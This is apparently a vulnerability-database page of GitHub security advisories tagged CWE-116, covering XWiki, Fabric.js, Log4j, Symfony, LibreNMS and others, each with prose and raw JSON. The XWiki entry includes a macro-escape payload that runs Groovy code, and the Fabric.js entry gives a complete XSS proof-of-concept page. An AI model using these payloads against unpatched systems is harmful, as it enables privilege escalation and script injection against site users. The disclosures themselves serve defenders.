Common Weakness Enumeration

CWE-116

Allowed-with-Review

Improper Encoding or Escaping of Output

Abstraction: Class · Status: Draft

The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.

611 vulnerabilities reference this CWE, most recent first.

GHSA-VWR6-QP4Q-2WJ7

Vulnerability from github – Published: 2023-03-03 22:48 – Updated: 2023-03-03 22:48
VLAI
Summary
XWiki Platform vulnerable to privilege escalation via async macro and IconThemeSheet from the user profile
Details

Impact

One can execute any wiki content with the right of IconThemeSheet author by creating an icon theme with the following content:

}}}
{{async async="true"}}
{{groovy}}
  println("Hello from Groovy!")
{{/groovy}}
{{/async}}
{{{

Can be done by creating a new page or even through the user profile for users not having edit right.

Patches

This has been patched in XWiki 14.9, 14.4.6, and 13.10.10.

Workarounds

An easy workaround is to actually fix the bug in the page IconThemesCode.IconThemeSheet by applying the following modification: https://github.com/xwiki/xwiki-platform/commit/48caf7491595238af2b531026a614221d5d61f38#diff-2ec9d716673ee049937219cdb0a92e520f81da14ea84d144504b97ab2bdae243R45

References

https://jira.xwiki.org/browse/XWIKI-19731

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira * Email us at Security ML

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-icon-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.2-milestone-1"
            },
            {
              "fixed": "13.10.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-icon-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "14.0"
            },
            {
              "fixed": "14.4.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-icon-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "14.5"
            },
            {
              "fixed": "14.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26472"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-03T22:48:57Z",
    "nvd_published_at": "2023-03-02T19:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nOne can execute any wiki content with the right of IconThemeSheet author by creating an icon theme with the following content:\n\n```\n}}}\n{{async async=\"true\"}}\n{{groovy}}\n  println(\"Hello from Groovy!\")\n{{/groovy}}\n{{/async}}\n{{{\n```\n\nCan be done by creating a new page or even through the user profile for users not having edit right.\n\n### Patches\n\nThis has been patched in XWiki 14.9, 14.4.6, and 13.10.10.\n\n### Workarounds\n\nAn easy workaround is to actually fix the bug in the page `IconThemesCode.IconThemeSheet` by applying the following modification: https://github.com/xwiki/xwiki-platform/commit/48caf7491595238af2b531026a614221d5d61f38#diff-2ec9d716673ee049937219cdb0a92e520f81da14ea84d144504b97ab2bdae243R45\n\n### References\n\nhttps://jira.xwiki.org/browse/XWIKI-19731\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira](http://jira.xwiki.org)\n* Email us at [Security ML](mailto:security@xwiki.org)\n",
  "id": "GHSA-vwr6-qp4q-2wj7",
  "modified": "2023-03-03T22:48:57Z",
  "published": "2023-03-03T22:48:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vwr6-qp4q-2wj7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26472"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/48caf7491595238af2b531026a614221d5d61f38#diff-2ec9d716673ee049937219cdb0a92e520f81da14ea84d144504b97ab2bdae243R45"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-19731"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XWiki Platform vulnerable to privilege escalation via async macro and IconThemeSheet from the user profile"
}

GHSA-VX8H-6MFQ-GV3P

Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-22 15:31
VLAI
Details

CWE-116 Improper Encoding or Escaping of Output vulnerability exists that could cause log injection and forged log when an attacker alters the POST /j_security check request payload.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2404"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-14T16:16:39Z",
    "severity": "MODERATE"
  },
  "details": "CWE-116 Improper Encoding or Escaping of Output vulnerability exists that could cause log injection and forged log when an attacker alters the POST /j_security check request payload.",
  "id": "GHSA-vx8h-6mfq-gv3p",
  "modified": "2026-04-22T15:31:32Z",
  "published": "2026-04-14T18:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2404"
    },
    {
      "type": "WEB",
      "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2026-104-01.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-W22M-HVVM-XMWX

Vulnerability from github – Published: 2026-06-12 21:00 – Updated: 2026-06-12 21:00
VLAI
Summary
Fabric.js improper escaping in fabric.Gradient colorStops leads to XSS in SVG serialization
Details

Summary

A potential Cross-Site Scripting (XSS) vulnerability exists in Fabric.js due to improper escaping of user-controlled input during SVG serialization via the toSVG() method.

Specifically, the color field within the colorStops array of a fabric.Gradient object is not properly escaped when converted into SVG <stop> elements. If an application renders the generated SVG string into the DOM (e.g., via innerHTML), this may allow an attacker to inject arbitrary HTML/SVG and execute JavaScript in the victim's browser.

Details

During SVG export, Fabric.js serializes gradient color stops into <stop> elements like:

<stop offset="0" stop-color="..."></stop>

However, the color value is inserted into the stop-color attribute without proper escaping of special characters such as ", <, and >. This allows crafted input to break out of the attribute context and inject arbitrary markup.

For example:

color: 'red"><img src="x" onerror="alert(1)">'

may result in:

<stop offset="0" stop-color="red">
<img src="x" onerror="alert(1)">

This breaks the intended SVG structure and introduces executable HTML.

PoC (Proof of Concept)

Successfully verified on v7.2.0 (current latest version). The following HTML and JavaScript code reproduces the vulnerability. The code constructs a rectangle with a maliciously crafted gradient color stop and exports it to SVG:

<!DOCTYPE html>
<html>
<head>
   <title>Fabric.js SVG Export XSS Bypass Test</title>
   <script src="[https://cdn.jsdelivr.net/npm/fabric@7.2.0/dist/index.js](https://cdn.jsdelivr.net/npm/fabric@7.2.0/dist/index.js)"></script>
</head>
<body>
   <h1>Fabric.js SVG Export XSS Bypass Test (Gradient Color)</h1>
   <canvas id="c" width="400" height="300"></canvas>

   <h3>SVG Output Rendering:</h3>
   <div id="svg-output" style="border: 1px solid #ccc; padding: 10px; margin-top: 10px;"></div>

   <script>
       setTimeout(() => {
           const canvas = new fabric.Canvas('c');

           // Construct a malicious gradient object
           const maliciousGradient = new fabric.Gradient({
               type: 'linear',
               coords: { x1: 0, y1: 0, x2: 100, y2: 0 },
               colorStops: [
                   {
                       offset: 0,
                       // Inject XSS payload to prematurely close the attribute/tag
                       color: 'red"><img src="x" onerror="alert(\'XSS Triggered Successfully!\')">'
                   },
                   { offset: 1, color: 'blue' }
               ]
           });

           const rect = new fabric.Rect({
               left: 50, top: 50, width: 300, height: 100,
               fill: maliciousGradient
           });

           canvas.add(rect);

           // Export to SVG string containing the malicious code
           const svgOutput = canvas.toSVG();

           // Render on the page to trigger the XSS
           document.getElementById('svg-output').innerHTML = svgOutput;
       }, 100);
   </script>
</body>
</html>

Impact

This issue can lead to XSS in applications that: 1. Allow user-controlled input in gradient definitions (e.g., color values) 2. Use canvas.toSVG() to export content 3. Insert the resulting SVG string into the DOM without sanitization (e.g., via innerHTML)

Successful exploitation may result in the execution of arbitrary JavaScript in the victim's browser, theft of sensitive data, or unauthorized actions on behalf of the user.

Suggested Fix

Proper Escaping (Recommended): Escape special characters in attribute values during SVG serialization.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fabric"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44311"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-12T21:00:32Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nA potential Cross-Site Scripting (XSS) vulnerability exists in Fabric.js due to improper escaping of user-controlled input during SVG serialization via the `toSVG()` method.\n\nSpecifically, the `color` field within the `colorStops` array of a `fabric.Gradient` object is not properly escaped when converted into SVG `\u003cstop\u003e` elements. If an application renders the generated SVG string into the DOM (e.g., via `innerHTML`), this may allow an attacker to inject arbitrary HTML/SVG and execute JavaScript in the victim\u0027s browser.\n\n### Details\n\nDuring SVG export, Fabric.js serializes gradient color stops into `\u003cstop\u003e` elements like:\n\n```xml\n\u003cstop offset=\"0\" stop-color=\"...\"\u003e\u003c/stop\u003e\n```\n\nHowever, the `color` value is inserted into the `stop-color` attribute without proper escaping of special characters such as `\"`, `\u003c`, and `\u003e`. This allows crafted input to break out of the attribute context and inject arbitrary markup.\n\nFor example:\n```js\ncolor: \u0027red\"\u003e\u003cimg src=\"x\" onerror=\"alert(1)\"\u003e\u0027\n```\n\nmay result in:\n```xml\n\u003cstop offset=\"0\" stop-color=\"red\"\u003e\n\u003cimg src=\"x\" onerror=\"alert(1)\"\u003e\n```\nThis breaks the intended SVG structure and introduces executable HTML.\n\n### PoC (Proof of Concept)\n\nSuccessfully verified on **v7.2.0** (current latest version). The following HTML and JavaScript code reproduces the vulnerability. The code constructs a rectangle with a maliciously crafted gradient color stop and exports it to SVG:\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n   \u003ctitle\u003eFabric.js SVG Export XSS Bypass Test\u003c/title\u003e\n   \u003cscript src=\"[https://cdn.jsdelivr.net/npm/fabric@7.2.0/dist/index.js](https://cdn.jsdelivr.net/npm/fabric@7.2.0/dist/index.js)\"\u003e\u003c/script\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n   \u003ch1\u003eFabric.js SVG Export XSS Bypass Test (Gradient Color)\u003c/h1\u003e\n   \u003ccanvas id=\"c\" width=\"400\" height=\"300\"\u003e\u003c/canvas\u003e\n   \n   \u003ch3\u003eSVG Output Rendering:\u003c/h3\u003e\n   \u003cdiv id=\"svg-output\" style=\"border: 1px solid #ccc; padding: 10px; margin-top: 10px;\"\u003e\u003c/div\u003e\n\n   \u003cscript\u003e\n       setTimeout(() =\u003e {\n           const canvas = new fabric.Canvas(\u0027c\u0027);\n           \n           // Construct a malicious gradient object\n           const maliciousGradient = new fabric.Gradient({\n               type: \u0027linear\u0027,\n               coords: { x1: 0, y1: 0, x2: 100, y2: 0 },\n               colorStops: [\n                   {\n                       offset: 0,\n                       // Inject XSS payload to prematurely close the attribute/tag\n                       color: \u0027red\"\u003e\u003cimg src=\"x\" onerror=\"alert(\\\u0027XSS Triggered Successfully!\\\u0027)\"\u003e\u0027\n                   },\n                   { offset: 1, color: \u0027blue\u0027 }\n               ]\n           });\n\n           const rect = new fabric.Rect({\n               left: 50, top: 50, width: 300, height: 100,\n               fill: maliciousGradient\n           });\n\n           canvas.add(rect);\n\n           // Export to SVG string containing the malicious code\n           const svgOutput = canvas.toSVG();\n\n           // Render on the page to trigger the XSS\n           document.getElementById(\u0027svg-output\u0027).innerHTML = svgOutput;\n       }, 100);\n   \u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nThis issue can lead to XSS in applications that:\n1. Allow user-controlled input in gradient definitions (e.g., color values)\n2. Use `canvas.toSVG()` to export content\n3. Insert the resulting SVG string into the DOM without sanitization (e.g., via `innerHTML`)\n\nSuccessful exploitation may result in the execution of arbitrary JavaScript in the victim\u0027s browser, theft of sensitive data, or unauthorized actions on behalf of the user.\n\n### Suggested Fix\n**Proper Escaping (Recommended)**: Escape special characters in attribute values during SVG serialization.",
  "id": "GHSA-w22m-hvvm-xmwx",
  "modified": "2026-06-12T21:00:32Z",
  "published": "2026-06-12T21:00:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fabricjs/fabric.js/security/advisories/GHSA-w22m-hvvm-xmwx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fabricjs/fabric.js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fabricjs/fabric.js/releases/tag/v740"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Fabric.js improper escaping in fabric.Gradient colorStops leads to XSS in SVG serialization"
}

GHSA-W2P3-47C3-R8H2

Vulnerability from github – Published: 2022-05-24 17:34 – Updated: 2022-05-24 17:34
VLAI
Details

web/controllers/ApiController.groovy in BigBlueButton before 2.2.29 lacks certain parameter sanitization, as demonstrated by accepting control characters in a user name.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-28954"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-11-19T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "web/controllers/ApiController.groovy in BigBlueButton before 2.2.29 lacks certain parameter sanitization, as demonstrated by accepting control characters in a user name.",
  "id": "GHSA-w2p3-47c3-r8h2",
  "modified": "2022-05-24T17:34:40Z",
  "published": "2022-05-24T17:34:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28954"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bigbluebutton/bigbluebutton/issues/10818"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bigbluebutton/bigbluebutton/commit/5c911ddeec4493f40f42e2f137800ed4692004a4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bigbluebutton/bigbluebutton/commit/e59bcd0c33a6a3203c011faa8823ba2cac1e4f37"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bigbluebutton/bigbluebutton/compare/v2.2.28...v2.2.29"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-W35J-PV5H-Q9Q9

Vulnerability from github – Published: 2026-04-10 18:31 – Updated: 2026-04-13 23:59
VLAI
Summary
Apache Log4j JSON Template Layout: Improper serialization of non-finite floating-point values in JsonTemplateLayout
Details

Apache Log4j's JsonTemplateLayout, in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records.

An attacker can exploit this issue only if both of the following conditions are met:

  • The application uses JsonTemplateLayout.
  • The application logs a MapMessage containing an attacker-controlled floating-point value.

Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.logging.log4j:log4j-layout-template-json"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.14.0"
            },
            {
              "fixed": "2.25.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.logging.log4j:log4j-layout-template-json"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0-alpha1"
            },
            {
              "last_affected": "3.0.0-beta3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34481"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T21:16:54Z",
    "nvd_published_at": "2026-04-10T16:16:31Z",
    "severity": "MODERATE"
  },
  "details": "Apache Log4j\u0027s [`JsonTemplateLayout`](https://logging.apache.org/log4j/2.x/manual/json-template-layout.html), in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (`NaN`, `Infinity`, or `-Infinity`), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records.\n\nAn attacker can exploit this issue only if both of the following conditions are met:\n\n  *  The application uses `JsonTemplateLayout`.\n  *  The application logs a `MapMessage` containing an attacker-controlled floating-point value.\n\nUsers are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.",
  "id": "GHSA-w35j-pv5h-q9q9",
  "modified": "2026-04-13T23:59:41Z",
  "published": "2026-04-10T18:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34481"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/logging-log4j2/pull/4080"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/logging-log4j2"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv"
    },
    {
      "type": "WEB",
      "url": "https://logging.apache.org/cyclonedx/vdr.xml"
    },
    {
      "type": "WEB",
      "url": "https://logging.apache.org/log4j/2.x/manual/json-template-layout.html"
    },
    {
      "type": "WEB",
      "url": "https://logging.apache.org/security.html#CVE-2026-34481"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/04/10/10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Apache Log4j JSON Template Layout: Improper serialization of non-finite floating-point values in JsonTemplateLayout"
}

GHSA-W4FW-R8M4-V5QV

Vulnerability from github – Published: 2022-11-11 12:00 – Updated: 2022-11-16 12:00
VLAI
Details

A vulnerability has been found in Activity Log Plugin and classified as critical. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument X-Forwarded-For leads to improper output neutralization for logs. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213448.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-3941"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-707",
      "CWE-74"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-11-11T07:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability has been found in Activity Log Plugin and classified as critical. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument X-Forwarded-For leads to improper output neutralization for logs. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213448.",
  "id": "GHSA-w4fw-r8m4-v5qv",
  "modified": "2022-11-16T12:00:22Z",
  "published": "2022-11-11T12:00:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3941"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1YNOLomPC95rRvtk0topUhStVIa7Y8lcq/view"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/file/d/1x-pgK3_-uS7NWfkEt_tk4Wc9FhXk-pYX/view"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.213448"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W4RC-RX25-8M86

Vulnerability from github – Published: 2020-02-12 18:44 – Updated: 2021-08-19 17:13
VLAI
Summary
Improper Input Validation in Symfony
Details

An issue was discovered in Symfony before 4.2.12 and 4.3.x before 4.3.8. The VarExport component incorrectly escapes strings, allowing some specially crafted ones to escalate to execution of arbitrary PHP code. This is related to symfony/var-exporter.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/symfony"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2.0"
            },
            {
              "fixed": "4.2.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/symfony"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.3.0"
            },
            {
              "fixed": "4.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/var-exporter"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2.0"
            },
            {
              "fixed": "4.2.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "symfony/var-exporter"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.3.0"
            },
            {
              "fixed": "4.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-11325"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-02-11T20:39:28Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in Symfony before 4.2.12 and 4.3.x before 4.3.8. The VarExport component incorrectly escapes strings, allowing some specially crafted ones to escalate to execution of arbitrary PHP code. This is related to symfony/var-exporter.",
  "id": "GHSA-w4rc-rx25-8m86",
  "modified": "2021-08-19T17:13:33Z",
  "published": "2020-02-12T18:44:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11325"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-11325.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/var-exporter/CVE-2019-11325.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/symfony/symfony/releases/tag/v4.3.8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/symfony/var-exporter/compare/d8bf442...57e00f3"
    },
    {
      "type": "WEB",
      "url": "https://symfony.com/blog/cve-2019-11325-fix-escaping-of-strings-in-varexporter"
    },
    {
      "type": "WEB",
      "url": "https://symfony.com/blog/symfony-4-3-8-released"
    },
    {
      "type": "WEB",
      "url": "https://symfony.com/cve-2019-11325"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Input Validation in Symfony"
}

GHSA-W5R2-GVGF-MPM8

Vulnerability from github – Published: 2019-10-11 18:43 – Updated: 2021-05-11 14:41
VLAI
Summary
Improper Encoding or Escaping of Output and Injection in LibreNMS
Details

An issue was discovered in LibreNMS 1.50.1. The scripts that handle graphing options (includes/html/graphs/common.inc.php and includes/html/graphs/graphs.inc.php) do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with mysqli_real_escape_string, which is only useful for preventing SQL injection attacks; other parameters are unfiltered. This allows an attacker to inject RRDtool syntax with newline characters via the html/graph.php and html/graph-realtime.php scripts. RRDtool syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, disclosing file content, denial of service, or writing arbitrary files. NOTE, relative to CVE-2019-10665, this requires authentication and the pathnames differ.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.50.1"
            },
            {
              "fixed": "1.53"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-12463"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2019-09-25T12:52:31Z",
    "nvd_published_at": "2019-09-09T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in LibreNMS 1.50.1. The scripts that handle graphing options (includes/html/graphs/common.inc.php and includes/html/graphs/graphs.inc.php) do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with mysqli_real_escape_string, which is only useful for preventing SQL injection attacks; other parameters are unfiltered. This allows an attacker to inject RRDtool syntax with newline characters via the html/graph.php and html/graph-realtime.php scripts. RRDtool syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, disclosing file content, denial of service, or writing arbitrary files. NOTE, relative to CVE-2019-10665, this requires authentication and the pathnames differ.",
  "id": "GHSA-w5r2-gvgf-mpm8",
  "modified": "2021-05-11T14:41:55Z",
  "published": "2019-10-11T18:43:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12463"
    },
    {
      "type": "WEB",
      "url": "https://www.darkmatter.ae/xen1thlabs/librenms-rrdtool-injection-vulnerability-xl-19-022"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Encoding or Escaping of Output and Injection in LibreNMS"
}

GHSA-W69G-QRMR-3CF2

Vulnerability from github – Published: 2026-01-26 18:31 – Updated: 2026-01-28 21:31
VLAI
Details

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) fail to include the X-Content-Type-Options: nosniff response header on web management interfaces. As a result, browsers that perform MIME sniffing may incorrectly interpret attacker-influenced responses as executable script.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-24439"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-26T18:16:41Z",
    "severity": "LOW"
  },
  "details": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) fail to include the X-Content-Type-Options: nosniff response header on web management interfaces. As a result, browsers that perform MIME sniffing may incorrectly interpret attacker-influenced responses as executable script.",
  "id": "GHSA-w69g-qrmr-3cf2",
  "modified": "2026-01-28T21:31:19Z",
  "published": "2026-01-26T18:31:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24439"
    },
    {
      "type": "WEB",
      "url": "https://www.tendacn.com/product/W30E"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-lacks-x-content-type-options-header"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-W6M2-RF66-Q93W

Vulnerability from github – Published: 2023-12-15 03:30 – Updated: 2023-12-28 18:30
VLAI
Details

lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-42183"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-15T01:15:08Z",
    "severity": "MODERATE"
  },
  "details": "lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.",
  "id": "GHSA-w6m2-rf66-q93w",
  "modified": "2023-12-28T18:30:32Z",
  "published": "2023-12-15T03:30:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lockss/lockss-daemon/security/advisories/GHSA-mgqj-hphf-9588"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42183"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-4.3
Architecture and Design

